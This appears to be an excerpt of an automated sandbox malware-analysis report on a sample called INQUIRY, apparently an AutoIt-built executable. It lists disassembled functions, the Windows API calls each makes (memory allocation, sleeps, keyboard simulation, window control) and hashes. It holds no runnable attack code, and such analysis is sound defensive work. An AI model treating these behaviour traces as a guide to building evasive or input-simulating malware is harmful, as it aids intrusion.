                                                                                                • Part of subcall function 00A14B6A: FreeLibrary.KERNEL32(00000000), ref: 00A14BA4
                                                                                                • Part of subcall function 00A14C70: _memmove.LIBCMT ref: 00A14CBA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 1396898556-0
                                                                                              • Opcode ID: 23cde09014090edc2430f3bab86b7b4985df16515e9484a354efbad0331e130d
                                                                                              • Instruction ID: e191f3259315ce6efbccf67d632e33e181598a1fb11c8b5fdd427325c2e86fdc
                                                                                              • Opcode Fuzzy Hash: 23cde09014090edc2430f3bab86b7b4985df16515e9484a354efbad0331e130d
                                                                                              • Instruction Fuzzy Hash: F011E331604205ABCF10FFB8CE12FEE77A9AF88710F108829F541E71C1DA719A419B50
                                                                                              Function 00A4FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClearVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1473721057-0
                                                                                              • Opcode ID: d2e8ca1450afd42e88cd619902c7f04f3e3e97e15327ab62ce90032bc6a20655
                                                                                              • Instruction ID: 4a2ea3f861b0ae2ded9525df986a72ef49ffe6231433a6bec71fdde3b3a9a6db
                                                                                              • Opcode Fuzzy Hash: d2e8ca1450afd42e88cd619902c7f04f3e3e97e15327ab62ce90032bc6a20655
                                                                                              • Instruction Fuzzy Hash: 86210FB4A08311DFCB14DF64D454B5ABBE1BF88314F058968F88A97722D731E849CB92
                                                                                              Function 00A15BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00A156A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00A15C16
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: bc1ce4290fc9554363b87683944546318024309501fbe7516ff2e4036c07ad22
                                                                                              • Instruction ID: 5cc1e90a55963fe7b1c8fb4445b12043f44d783e50cb59dc2a15e805296524c0
                                                                                              • Opcode Fuzzy Hash: bc1ce4290fc9554363b87683944546318024309501fbe7516ff2e4036c07ad22
                                                                                              • Instruction Fuzzy Hash: A1113D31608B04DFD320CF65C440BA2B7F4EF84754F10C51EE99A8A651D770E885CB50
                                                                                              Function 00A34863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __lock_file.LIBCMT ref: 00A348A6
                                                                                                • Part of subcall function 00A38B28: __getptd_noexit.LIBCMT ref: 00A38B28
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __getptd_noexit__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2597487223-0
                                                                                              • Opcode ID: 5b19fe4209d1e4f76b1d4d5d78548957e5c742daa5dcc609afbd2850d8b7cae8
                                                                                              • Instruction ID: 106505ea5ed3409f268cb91fdb323d8209e8f7b83c67c752c472ab8b7de3cdfc
                                                                                              • Opcode Fuzzy Hash: 5b19fe4209d1e4f76b1d4d5d78548957e5c742daa5dcc609afbd2850d8b7cae8
                                                                                              • Instruction Fuzzy Hash: 96F0CD31901709EBEF11AFB48D067AE7AA0AF05329F158418F424AB191CBBC9A51DB91
                                                                                              Function 00A14E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,?,00AD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A14E7E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: f6202d0b461117279f7909c59aa4a9e5977b23e030f0b09ff3b19253b7bc6ebc
                                                                                              • Instruction ID: ddc6c5806c65fa5e283b9caad761d5935bb5a76f944236669187bea884177c0b
                                                                                              • Opcode Fuzzy Hash: f6202d0b461117279f7909c59aa4a9e5977b23e030f0b09ff3b19253b7bc6ebc
                                                                                              • Instruction Fuzzy Hash: 3FF03975501711CFDB349F68E494892BBF1BF1832A3208A3EE2D686660C7329880DF80
                                                                                              Function 00A30791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A307B0
                                                                                                • Part of subcall function 00A17BCC: _memmove.LIBCMT ref: 00A17C06
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongNamePath_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2514874351-0
                                                                                              • Opcode ID: 66be4aa7eb448a12d3c08b36f10f96451469f82dc97f9c147ac1e7554b174a68
                                                                                              • Instruction ID: 627ac5c94bacd1a98b4b8670aafd3e324e2cfa181bb6c1429cdf92d1281df90d
                                                                                              • Opcode Fuzzy Hash: 66be4aa7eb448a12d3c08b36f10f96451469f82dc97f9c147ac1e7554b174a68
                                                                                              • Instruction Fuzzy Hash: 47E0CD36A081285BC720D6989C05FEA77EDDFC87A0F0441B6FC0CD7205DD609CC086D0
                                                                                              Function 00A78E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 2638373210-0
                                                                                              • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                              • Instruction ID: 7e2f9af9308fa38385899af269157070641556055686bf478b088ac628c8ecb2
                                                                                              • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                                              • Instruction Fuzzy Hash: 3DE092B0504B005BD7388B24DC00BE377E1AB05304F00481DF2AAC3241EB62B8418759
                                                                                              Function 00A15C4E Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00A4DD42,?,?,00000000), ref: 00A15C5F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 007bb50b56d3c8783c5a047a9363a79f6b463a09fa044480382cd232bde3230a
                                                                                              • Instruction ID: 242455996ce083b46a304bf7e7456faef06ee64ae9dd687f3e0041f06555329a
                                                                                              • Opcode Fuzzy Hash: 007bb50b56d3c8783c5a047a9363a79f6b463a09fa044480382cd232bde3230a
                                                                                              • Instruction Fuzzy Hash: C1D0C77464020CBFE710DB80DC46FA977BCD705710F200295FE0496290D6B27D508795
                                                                                              Function 00A3525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wfsopen
                                                                                              • String ID:
                                                                                              • API String ID: 197181222-0
                                                                                              • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                              • Instruction ID: 1a4e3a9e19969cdbed7e23aec351490e7fc0f416d7a1e965ef4cb63d352f5d88
                                                                                              • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                              • Instruction Fuzzy Hash: 04B092B684020C77CE012A96EC02A8A3B199B41764F408020FB0C18162A673E6649A89
                                                                                              Function 00A7D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000002,00000000), ref: 00A7D1FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1452528299-0
                                                                                              • Opcode ID: 59f72c08eedec0db9792653e66fe2d16cf9fa9f87fea2ab7669b954dad1108d6
                                                                                              • Instruction ID: e65ca849ed15cef49b091edcca3ad7d86a19e38332741d958f31e36c179162e6
                                                                                              • Opcode Fuzzy Hash: 59f72c08eedec0db9792653e66fe2d16cf9fa9f87fea2ab7669b954dad1108d6
                                                                                              • Instruction Fuzzy Hash: 7A7164346083018FC704EF64C991AAEB7F4AF85354F44892DF89A9B3A2DB30ED45CB52
                                                                                              Function 00A30C08 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction ID: f699bf38e15a646f90e4f521893d0986cc2414bf90eaf67999c3774755c3e38c
                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction Fuzzy Hash: 3531D170A001059BC718DF59C4A4A69F7B6FB59300F64A7A5E84ACB352DB31EDC1DBC0
                                                                                              Function 01DA229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000001F4), ref: 01DA22B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                              • Instruction ID: feb76373901ad26097e0963b36ac45bf0d802c735044772b88a9d02fe97139bd
                                                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                              • Instruction Fuzzy Hash: 99E0BF7494010EEFDB00EFA4D5496DE7BB4EF04311F1005A1FD05D7681DB309E548A62
                                                                                              Function 01DA22A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • Sleep.KERNELBASE(000001F4), ref: 01DA22B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                              • Instruction ID: 38556891578e84a9e0d14826d2f3302d1e2f0d0e21298345d45b10793488872e
                                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                              • Instruction Fuzzy Hash: 80E0E67494010EDFDB00EFB4D54969E7FF4EF04301F100161FD01D2281D6309D508A72

                                                                                              Non-executed Functions

                                                                                              Function 00A9CABC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 632windowkeyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00A12612: GetWindowLongW.USER32(?,000000EB), ref: 00A12623
                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00A9CB37
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A9CB95
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A9CBD6
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A9CC00
                                                                                              • SendMessageW.USER32 ref: 00A9CC29
                                                                                              • _wcsncpy.LIBCMT ref: 00A9CC95
                                                                                              • GetKeyState.USER32(00000011), ref: 00A9CCB6
                                                                                              • GetKeyState.USER32(00000009), ref: 00A9CCC3
                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00A9CCD9
                                                                                              • GetKeyState.USER32(00000010), ref: 00A9CCE3
                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A9CD0C
                                                                                              • SendMessageW.USER32 ref: 00A9CD33
                                                                                              • SendMessageW.USER32(?,00001030,?,00A9B348), ref: 00A9CE37
                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00A9CE4D
                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00A9CE60
                                                                                              • SetCapture.USER32(?), ref: 00A9CE69
                                                                                              • ClientToScreen.USER32(?,?), ref: 00A9CECE
                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00A9CEDB
                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A9CEF5
                                                                                              • ReleaseCapture.USER32 ref: 00A9CF00
                                                                                              • GetCursorPos.USER32(?), ref: 00A9CF3A
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A9CF47
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A9CFA3
                                                                                              • SendMessageW.USER32 ref: 00A9CFD1
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A9D00E
                                                                                              • SendMessageW.USER32 ref: 00A9D03D
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00A9D05E
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00A9D06D
                                                                                              • GetCursorPos.USER32(?), ref: 00A9D08D
                                                                                              • ScreenToClient.USER32(?,?), ref: 00A9D09A
                                                                                              • GetParent.USER32(?), ref: 00A9D0BA
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00A9D123
                                                                                              • SendMessageW.USER32 ref: 00A9D154
                                                                                              • ClientToScreen.USER32(?,?), ref: 00A9D1B2
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00A9D1E2
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00A9D20C
                                                                                              • SendMessageW.USER32 ref: 00A9D22F
                                                                                              • ClientToScreen.USER32(?,?), ref: 00A9D281
                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00A9D2B5
                                                                                                • Part of subcall function 00A125DB: GetWindowLongW.USER32(?,000000EB), ref: 00A125EC
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A9D351
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                              • String ID: @GUI_DRAGID$F
                                                                                              • API String ID: 3977979337-4164748364
                                                                                              • Opcode ID: 1afc19769ff2e22d06f415048cc7cc8b0e4ff6441eba78aaca1d69c0cebd0aa5
                                                                                              • Instruction ID: 68947b57397b96de7f21211e651ff29b2ed7d0a611054b65780167265cdc9449
                                                                                              • Opcode Fuzzy Hash: 1afc19769ff2e22d06f415048cc7cc8b0e4ff6441eba78aaca1d69c0cebd0aa5
                                                                                              • Instruction Fuzzy Hash: E3429C74704781AFDB24CF68C844AAABBE5FF49360F14091AF656CB2B0DB31D891DB52
                                                                                              Function 00A26F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$_memset
                                                                                              • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                              • API String ID: 1357608183-1798697756
                                                                                              • Opcode ID: 0d7c423997226a133f261d74addcb2fb6806e207caa5754953e64c5214beef08
                                                                                              • Instruction ID: 84a9099acb301608fa7f48adc57330b1db133e3e7ecf2e1e870ce10d5b7990d5
                                                                                              • Opcode Fuzzy Hash: 0d7c423997226a133f261d74addcb2fb6806e207caa5754953e64c5214beef08
                                                                                              • Instruction Fuzzy Hash: D393A075E04219DFDF24CF98D881BADB7B1FF48710F25816AE945AB281E7749E82CB40
                                                                                              Function 00A148D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(00000000,?), ref: 00A148DF
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A4D665
                                                                                              • IsIconic.USER32(?), ref: 00A4D66E
                                                                                              • ShowWindow.USER32(?,00000009), ref: 00A4D67B
                                                                                              • SetForegroundWindow.USER32(?), ref: 00A4D685
                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00A4D69B
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A4D6A2
                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A4D6AE
                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A4D6BF
                                                                                              • AttachThreadInput.USER32(?,00000000,00000001), ref: 00A4D6C7
                                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00A4D6CF
                                                                                              • SetForegroundWindow.USER32(?), ref: 00A4D6D2
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4D6E7
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00A4D6F2
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4D6FC
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00A4D701
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4D70A
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00A4D70F
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A4D719
                                                                                              • keybd_event.USER32(00000012,00000000), ref: 00A4D71E
                                                                                              • SetForegroundWindow.USER32(?), ref: 00A4D721
